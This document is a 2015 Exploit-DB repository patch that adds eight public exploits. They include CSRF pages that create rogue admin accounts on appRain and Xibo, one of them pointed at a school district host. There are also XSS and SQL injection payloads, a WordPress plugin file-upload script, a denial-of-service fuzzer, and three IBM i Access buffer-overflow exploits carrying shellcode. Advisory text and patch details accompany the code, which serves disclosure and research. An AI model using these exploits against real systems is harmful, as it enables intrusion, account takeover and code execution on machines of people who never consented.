From 043724668fd027fe94f8d2adbe6ffe2be44bedfa Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 19 Nov 2015 05:03:31 +0000
Subject: [PATCH] DB: 2015-11-19

8 new exploits
---
 files.csv                         |  10 +-
 platforms/asp/webapps/38749.txt   |   7 +
 platforms/php/webapps/38744.txt   |  24 +++
 platforms/php/webapps/38745.txt   |  11 ++
 platforms/php/webapps/38746.html  |  75 ++++++++++
 platforms/php/webapps/38748.txt   |   7 +
 platforms/php/webapps/38750.txt   |  96 ++++++++++++
 platforms/windows/dos/38747.py    |  45 ++++++
 platforms/windows/local/38751.txt | 233 ++++++++++++++++++++++++++++++
 9 files changed, 507 insertions(+), 1 deletion(-)
 create mode 100755 platforms/asp/webapps/38749.txt
 create mode 100755 platforms/php/webapps/38744.txt
 create mode 100755 platforms/php/webapps/38745.txt
 create mode 100755 platforms/php/webapps/38746.html
 create mode 100755 platforms/php/webapps/38748.txt
 create mode 100755 platforms/php/webapps/38750.txt
 create mode 100755 platforms/windows/dos/38747.py
 create mode 100755 platforms/windows/local/38751.txt

diff --git a/files.csv b/files.csv
index 72b4a9ff9..0fb3354d3 100755
--- a/files.csv
+++ b/files.csv
@@ -31880,7 +31880,7 @@ id,file,description,date,author,platform,type,port
 35376,platforms/php/webapps/35376.txt,"mySeatXT 0.164 - 'lang' Parameter Local File Include Vulnerability",2011-02-16,"AutoSec Tools",php,webapps,0
 35377,platforms/windows/local/35377.rb,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - (.wax) SEH Buffer Overflow",2014-11-26,"Muhamad Fadzil Ramli",windows,local,0
 35378,platforms/php/webapps/35378.txt,"Wordpress DB Backup Plugin - Arbitrary File Download",2014-11-26,"Ashiyane Digital Security Team",php,webapps,80
-35379,platforms/windows/dos/35379.go,"Elipse E3 HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80
+35379,platforms/windows/dos/35379.go,"Elipse E3 - HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80
 35382,platforms/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",android,dos,0
 35383,platforms/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 Traceroute Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80
 35384,platforms/cgi/webapps/35384.rb,"Device42 WAN Emulator 2.3 Ping Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80
@@ -35013,3 +35013,11 @@ id,file,description,date,author,platform,type,port
 38739,platforms/java/webapps/38739.txt,"SearchBlox Multiple Information Disclosure Vulnerabilities",2013-08-23,"Ricky Roane Jr",java,webapps,0
 38740,platforms/php/webapps/38740.txt,"cm3 Acora CMS 'top.aspx' Information Disclosure Vulnerability",2013-08-26,"Pedro Andujar",php,webapps,0
 38741,platforms/linux/remote/38741.txt,"Nmap Arbitrary File Write Vulnerability",2013-08-06,"Piotr Duszynski",linux,remote,0
+38744,platforms/php/webapps/38744.txt,"appRain CMF Multiple Cross Site Request Forgery Vulnerabilities",2013-08-29,"Yashar shahinzadeh",php,webapps,0
+38745,platforms/php/webapps/38745.txt,"Xibo 'layout' Parameter HTML Injection Vulnerability",2013-08-21,"Jacob Holcomb",php,webapps,0
+38746,platforms/php/webapps/38746.html,"Xibo Cross Site Request Forgery Vulnerability",2013-08-21,"Jacob Holcomb",php,webapps,0
+38747,platforms/windows/dos/38747.py,"Pwstore Denial of Service Vulnerability",2013-04-16,"Josep Pi Rodriguez",windows,dos,0
+38748,platforms/php/webapps/38748.txt,"dBlog CMS 'm' Parameter SQL Injection Vulnerability",2013-09-03,ACC3SS,php,webapps,0
+38749,platforms/asp/webapps/38749.txt,"Flo CMS 'archivem' Parameter SQL Injection Vulnerability",2013-09-03,ACC3SS,asp,webapps,0
+38750,platforms/php/webapps/38750.txt,"WordPress Users Ultra Plugin 1.5.50 - Unrestricted File Upload",2015-11-18,"Panagiotis Vagenas",php,webapps,0
+38751,platforms/windows/local/38751.txt,"IBM i Access 7.1 - Buffer Overflow Code Execution",2015-11-18,hyp3rlinx,windows,local,0
diff --git a/platforms/asp/webapps/38749.txt b/platforms/asp/webapps/38749.txt
new file mode 100755
index 000000000..723fc02ae
--- /dev/null
+++ b/platforms/asp/webapps/38749.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/62186/info
+
+Flo CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/blog/index.asp?archivem=' 
\ No newline at end of file
diff --git a/platforms/php/webapps/38744.txt b/platforms/php/webapps/38744.txt
new file mode 100755
index 000000000..edf584660
--- /dev/null
+++ b/platforms/php/webapps/38744.txt
@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/62061/info
+
+appRain CMF is prone to multiple cross-site request-forgery vulnerabilities.
+
+Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
+
+appRain CMF 3.0.2 is vulnerable; other versions may also be affected. 
+
+<img src="http://www.example.com//appRain-v-3.0.2/common/delete_row/Admin/[ID]" width="1" height="1">
+
+<html>
+<body onload="submitForm()">
+<form name="myForm" id="myForm"
+                action="http://www.example.com/appRain-v-3.0.2/admin/manage/add" method="post">
+                <input type="hidden" name="data[Admin][f_name]" value="abc">
+                <input type="hidden" name="data[Admin][l_name]" value="defghi">
+                <input type="hidden" name="data[Admin][email]" value="y.xvz@gmail.com">
+                <input type="hidden" name="data[Admin][username]" value="abc">
+                <input type="hidden" name="data[Admin][password]" value="abc123">
+                <input type="hidden" name="data[Admin][status]" value="Active">
+                <input type="hidden" name="data[Admin][description]" value="">
+</form>
+<script type='text/javascript'>document.myForm.submit();</script>
+</html>
\ No newline at end of file
diff --git a/platforms/php/webapps/38745.txt b/platforms/php/webapps/38745.txt
new file mode 100755
index 000000000..36cc5ddd1
--- /dev/null
+++ b/platforms/php/webapps/38745.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/62063/info
+
+Xibo is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user; other attacks are also possible.
+
+Xibo 1.4.2 is vulnerable; other versions may also be affected. 
+
+POST: /index.php?p=layout&q=add&ajax=true
+
+Data: layoutid=0&layout=Gimppy%3Cimg+src%3D42+onerror%3D'alert(%22InfoSec42%22)'%3E&description=%3Ciframe+src%3D'http%3A%2F%2Fsecurityevaluators.com'+width%3D1000+height%3D1000%3C%2Fiframe%3E&tags=&templateid=0 
\ No newline at end of file
diff --git a/platforms/php/webapps/38746.html b/platforms/php/webapps/38746.html
new file mode 100755
index 000000000..6cab195da
--- /dev/null
+++ b/platforms/php/webapps/38746.html
@@ -0,0 +1,75 @@
+source: http://www.securityfocus.com/bid/62064/info
+
+Xibo is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
+
+Xibo 1.4.2 is vulnerable; other versions may also be affected. 
+
+<html>
+<head>
+<title> Xibo - Digital Signage 1.4.2 CSRF Exploit.</title>
+<!--
+# CSRF Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
+# Exploited by: Jacob Holcomb - Security Analyst @ Independnet Security Evaluators
+# CVE: CSRF - CVE-2013-4889, XSS - CVE-2013-4888
+# http://infosec42.blogspot.com
+# http://securityevaluators.com
+-->
+</head>
+<body>
+<h1>Please wait... </h1>
+<script type="text/javascript">
+//Add super user
+function RF1(){
+    document.write('<form name="addAdmin" target ="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=user&q=AddUser&ajax=true" method="post">'+
+    '<input type="hidden" name="userid" value="0">'+
+    '<input type="hidden" name="username" value="Gimppy">'+
+    '<input type="hidden" name="password" value="ISE">'+
+    '<input type="hidden" name="email" value="Gimppy@infosec42.com">'+
+    '<input type="hidden" name="usertypeid" value="1">'+
+    '<input type="hidden" name="groupid" value="1">'+
+    '</form>');
+}
+
+//Set XSS Payloads
+function RF2(){
+    document.write('<form name="addXSS" target="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=layout&q=add&ajax=true" method="post">'+
+    '<input type="hidden" name="layoutid" value="0">'+
+    '<input type="hidden" name="layout" value="Gimppy<img src=42 onerror='alert(42)'>">'+
+    '<input type="hidden" name="description" value="<iframe src='http://securityevaluators.com' width=100 height=1000</iframe>">'+
+    '<input type="hidden" name="tags" value="">'+
+    '<input type="hidden" name="templateid" value="0">'+
+    '</form>');
+}
+
+function createPage(){
+    RF1();
+    RF2();
+}
+
+function _addAdmin(){
+    document.addAdmin.submit();
+}
+
+function _addXSS(){
+    document.addXSS.submit();
+}
+
+//Called Functions
+createPage()
+   
+for (var i = 0; i < 2; i++){
+    if(i == 0){
+        window.setTimeout(_addAdmin, 0500);
+    }
+    else if(i == 1){
+        window.setTimeout(_addXSS, 1000);
+    }
+    else{
+        continue;
+    }
+}
+</script>
+</body>
+</html>
diff --git a/platforms/php/webapps/38748.txt b/platforms/php/webapps/38748.txt
new file mode 100755
index 000000000..7cb0ec030
--- /dev/null
+++ b/platforms/php/webapps/38748.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/62146/info
+
+dBlog CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/dblog/storico.asp?m=[Sql Injection] 
\ No newline at end of file
diff --git a/platforms/php/webapps/38750.txt b/platforms/php/webapps/38750.txt
new file mode 100755
index 000000000..212b682a4
--- /dev/null
+++ b/platforms/php/webapps/38750.txt
@@ -0,0 +1,96 @@
+* Exploit Title: WordPress Users Ultra Plugin [Unrestricted File Upload]
+* Discovery Date: 2015/10/27
+* Public Disclosure Date: 2015/12/01
+* Exploit Author: Panagiotis Vagenas
+* Contact: https://twitter.com/panVagenas
+* Vendor Homepage: http://usersultra.com
+* Software Link: https://wordpress.org/plugins/users-ultra/
+* Version: 1.5.50
+* Tested on: WordPress 4.3.1
+* Category: webapps
+
+Description
+================================================================================
+
+WordPress plugin `Users Ultra Plugin` suffers for an unrestricted file upload vulnerability.
+
+Any user (registered or not) can exploit a misbehavior of the plugin in order to upload csv files to the infected website. Although the plugin checks file extension using an extensions white-list (in this case only csv files are white-listed), no other checks (mime, size etc) are taking place. This alone can expose the infected website to a variety of attacks, please see [OWASP Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload) to get an idea.
+
+Details
+================================================================================
+
+The plugin workflow that could allow a malicious user to exploit this misbehavior is as follows:
+
+1. Upon initialization of the plugin (anytime if it is activated) an instance of `XooUserUser` class is created
+2. In the constructor of `XooUserUser` class a check for POST variable `uultra-form-cvs-form-conf` is taking place
+    file `wp-content/plugins/users-ultra/xooclasses/xoo.userultra.user.php` lines 19-23
+    ```php
+    if (isset($_POST['uultra-form-cvs-form-conf'])) 
+    {
+	    /* Let's Update the Profile */
+	    $this->process_cvs($_FILES);				
+    }
+    ```
+3. Assuming the POST variable `uultra-form-cvs-form-conf` has been set in the request, the method `XooUserUser::process_cvs()` is called.
+4. `XooUserUser::process_cvs()` method process every file in $_FILES super-global by only making a check if the file has a `csv` extension
+
+In addition we mark the following points:
+
+1. A malicious user can create and activate user accounts by exploiting this vulnerability if `$_POST["uultra-activate-account"]` is set to `active`
+2. A welcome email is send if `$_POST["uultra-send-welcome-email"]` is set to 1
+3. The csv files uploaded to the server are stored in a directory (`wp-content/usersultramedia/import` by default) accessible by anyone
+4. Any additional columns present in the csv file are stored in `usermeta`
+5. No sanitization for values in csv file can easily lead to a Persistent XSS attack, so an attacker can compromise the whole site
+
+PoC
+================================================================================
+
+The following Python3 script forms a csv file and uploads it to a site
+
+```python3
+#!/usr/bin/python3
+import requests
+import csv
+import tempfile
+
+url = 'http://example.com/'
+
+postData = {
+    'uultra-form-cvs-form-conf': 1,
+    'uultra-send-welcome-email': 1,
+    'uultra-activate-account': 'pending'
+}
+
+csvFileHeader = ['user name', 'email', 'display name', 'registration date', 'first name', 'last name', 'age', 'country']
+csvFileRow = ['userName', 'email@example.com', 'User Name', '1/1/1', 'User', 'Name', '100', 'IO']
+
+csvFile = tempfile.NamedTemporaryFile(mode='a+t', suffix='.csv')
+
+wr = csv.writer(csvFile, quoting=csv.QUOTE_ALL, delimiter=',')
+
+wr.writerow(csvFileHeader)
+wr.writerow(csvFileRow)
+
+csvFile.seek(0)
+
+files = {'file.csv': csvFile}
+
+r = requests.post(url, data=postData, files=files)
+
+exit(0)
+```
+
+Timeline
+================================================================================
+
+2015/10/29 - Vendor notified via email
+2015/11/11 - Vendor notified via contact form in his website
+2015/11/13 - Vendor notified via support forums at wordpress.org
+2015/11/14 - Vendor responded and received report through email
+2015/11/15 - Vendor responded
+2015/11/15 - Patch released
+
+Solution
+================================================================================
+
+Update to version 1.5.59
diff --git a/platforms/windows/dos/38747.py b/platforms/windows/dos/38747.py
new file mode 100755
index 000000000..f3154823b
--- /dev/null
+++ b/platforms/windows/dos/38747.py
@@ -0,0 +1,45 @@
+source: http://www.securityfocus.com/bid/62112/info
+
+pwStore is prone to a remote denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the application, denying service to legitimate users.
+
+pwStore 2010.8.30.0 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/env python
+from sulley import *
+import sys
+import time
+
+s_initialize("HTTP")
+
+s_static("GET / HTTP/1.1\r\n")
+s_static("Host")
+s_static(":\x0d\x0a")
+s_static(" ")
+s_string("192.168.1.39")
+s_static("\r\n")
+s_static("\r\n")
+
+print "Instantiating session"
+sess = sessions.session(session_filename="https_pwstore.session", proto="ssl", sleep_time=0.50)
+print "Instantiating target"
+target = sessions.target("192.168.1.39", 443)
+#target.procmon = pedrpc.client("127.0.0.1", 26002)
+#target.netmon = pedrpc.client("127.0.0.1", 26001)
+
+target.procmon_options =  {
+    "proc_name" : "savant.exe",
+    "stop_commands" : ['wmic process where (name="savant.exe") delete"'],
+    "start_commands" : ['C:\\savant\\savant.exe'],
+}
+
+
+print "Adding target"
+sess.add_target(target)
+
+print "Building graph"
+sess.connect(s_get("HTTP"))
+
+print "Starting fuzzing now"
+sess.fuzz() 
diff --git a/platforms/windows/local/38751.txt b/platforms/windows/local/38751.txt
new file mode 100755
index 000000000..83f7eb653
--- /dev/null
+++ b/platforms/windows/local/38751.txt
@@ -0,0 +1,233 @@
+[+] Credits: John Page aka hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/IBMI-CLIENT-ACCESS-BUFFER-OVERFLOW.txt
+
+
+Vendor:
+==============
+www.ibm.com
+
+
+Product:
+====================================================
+IBM i Access for Windows
+Release 7.1 of IBM i Access for Windows is affected
+
+
+Vulnerability Type:
+=======================
+Stack Buffer Overflow
+Arbitrary Code Exec
+
+
+CVE Reference:
+==============
+CVE-2015-2023
+
+
+Vulnerability Details:
+=====================
+IBM i Access for Windows is vulnerable to a buffer overflow. A local
+attacker could overflow a buffer and execute arbitrary code on the Windows PC.
+
+client Access has ability to receive remote commands via "Cwbrxd.exe"
+service
+Ref: http://www-01.ibm.com/support/docview.wss?uid=nas8N1019253
+
+"Incoming remote command was designed for running non-interactive commands
+and programs on a PC", therefore a remote attacker could execute arbitrary code on the system.
+
+Remediation/Fixes
+The issue can be fixed by obtaining and applying the Service Pack SI57907.
+
+The buffer overflow vulnerability can be remediated by applying Service
+Pack SI57907.
+
+The Service Pack is available at:
+http://www-03.ibm.com/systems/power/software/i/access/windows_sp.html
+
+Workarounds and Mitigations
+None known
+
+CVSS Base Score: 4.4
+CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/104044 for the
+current score
+CVSS Environmental Score*: Undefined
+CVSS Vector: (AV:L/AC:M/Au:N/C:P/I:P/A:P)
+
+
+Exploit code(s):
+==============================================================================
+
+Three python POC scriptz follow that exploitz various component of IBM i
+Access.
+
+
+1) Exploits "ftdwprt.exe", direct EIP overwrite
+
+import struct,os,subprocess
+
+pgm="C:\\Program Files (x86)\\IBM\\Client Access\\AFPViewr\\ftdwprt.exe  "
+
+#shellcode to pop calc.exe Windows 7 SP1
+sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
+"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
+"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
+"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
+"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
+"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
+"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
+
+
+# use jmp or call esp in FTDBT.dll under AFPviewer for Client Access
+# we find ---> 0x638091df : jmp esp |  {PAGE_EXECUTE_READ} [FTDBDT.dll]
+ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.05.04.00
+(C:\Program Files (x86)\IBM\Client Access\AFPViewr\FTDBDT.dll)
+
+rp=struct.pack('<L', 0x638091FB)
+payload="A" * 1043+rp+sc+"\x90"*20
+subprocess.Popen([pgm, payload], shell=False) #<----1043 bytes outside of
+debugger use 1044 in debugger.
+
+
+==================================
+
+
+2) Exploits "ftdwinvw.exe", direct EIP overwrite
+
+import struct,os,subprocess
+
+pgm="C:\\Program Files (x86)\\IBM\\Client Access\\AFPViewr\\ftdwinvw.exe "
+
+
+#shellcode to pop calc.exe Windows 7 SP1
+sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
+"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
+"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
+"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
+"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
+"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
+"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
+
+
+#payload="A"*1044+"RRRR"+"\x90"*10+"B"*100 #Test EIP
+
+rp=struct.pack('<L', 0x638091fb) #CALL ESP (0x638091fb) FTDBDT.dll
+payload="A"*1044+rp+"\x90"*10+sc #KABOOM!!!
+subprocess.Popen([pgm, payload], shell=False)
+
+registers dump...
+
+EAX 0000040B
+ECX 0044AAB8 ASCII "AAAAAAAAA...
+EDX 7F17E09F
+EBX 00000000
+ESP 0018E5B8
+EBP 41414141
+ESI 005A9FB9 ASCII "AAAAAAAAA...
+EDI 0044E94C ftdwinvw.0044E94C
+EIP 52525252                    <----------BOOM!
+
+C 0  ES 002B 32bit 0(FFFFFFFF)
+P 0  CS 0023 32bit 0(FFFFFFFF)
+A 0  SS 002B 32bit 0(FFFFFFFF)
+Z 0  DS 002B 32bit 0(FFFFFFFF)
+S 0  FS 0053 32bit 7EFDD000(FFF)
+T 0  GS 002B 32bit 0(FFFFFFFF)
+D 0
+O 0  LastErr ERROR_SUCCESS (00000000)
+EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
+ST0 empty g
+ST1 empty g
+ST2 empty g
+ST3 empty g
+ST4 empty g
+ST5 empty g
+ST6 empty g
+ST7 empty g
+               3 2 1 0      E S P U O Z D I
+FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
+FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
+
+
+
+3) Exploits "PCSWS.exe", structured exeception handler (SEH) overwrite
+
+pgm="C:\\Program Files (x86)\\IBM\\Client Access\\Emulator\\pcsws.exe "
+
+
+#ctrl EIP at 1340 bytes, ESP points to RETURN to ntdll.770BB499 so we will
+jump 8 bytes to our SC
+#as ESP points to our SC 8 bytes after!
+
+jmp="\xEB\x06"+"\x90"*2
+#payload="A"*1336+"BBBB" #Test
+
+#shellcode to pop calc.exe Windows 7 SP1
+sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
+"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
+"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
+"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
+"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
+"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
+"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
+
+
+rp=struct.pack('<L', 0x678c1e49)                 #pop pop ret 0x67952486
+PCSW32X.dll
+payload="A"*1332+jmp+rp+sc+"\x90"*10             #KABOOOOOOOOOOOOOOOOOOM!
+subprocess.Popen([pgm, payload], shell=False)
+
+register dump...
+
+0018FF6C   41414141  AAAA
+0018FF70   41414141  AAAA
+0018FF74   41414141  AAAA
+0018FF78   41414141  AAAA  Pointer to next SEH record
+0018FF7C   42424242  BBBB  SE handler
+0018FF80   004C0400  .L.  pcsws.004C0400
+
+
+Disclosure Timeline:
+====================================
+Vendor Notification:  May 21, 2015
+November 18, 2015  : Public Disclosure
+
+
+Exploitation Technique:
+=======================
+Local / Remote
+
+
+Severity Level:
+================
+High
+
+
+Description:
+=================================================================================
+Request Method(s):          [+] local or remote commands via "Cwbrxd.exe"
+service
+
+
+Vulnerable Product:         [+] IBM i Access for Windows Release 7.1
+
+
+Affected Area(s):           [+] OS
+
+
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+by hyp3rlinx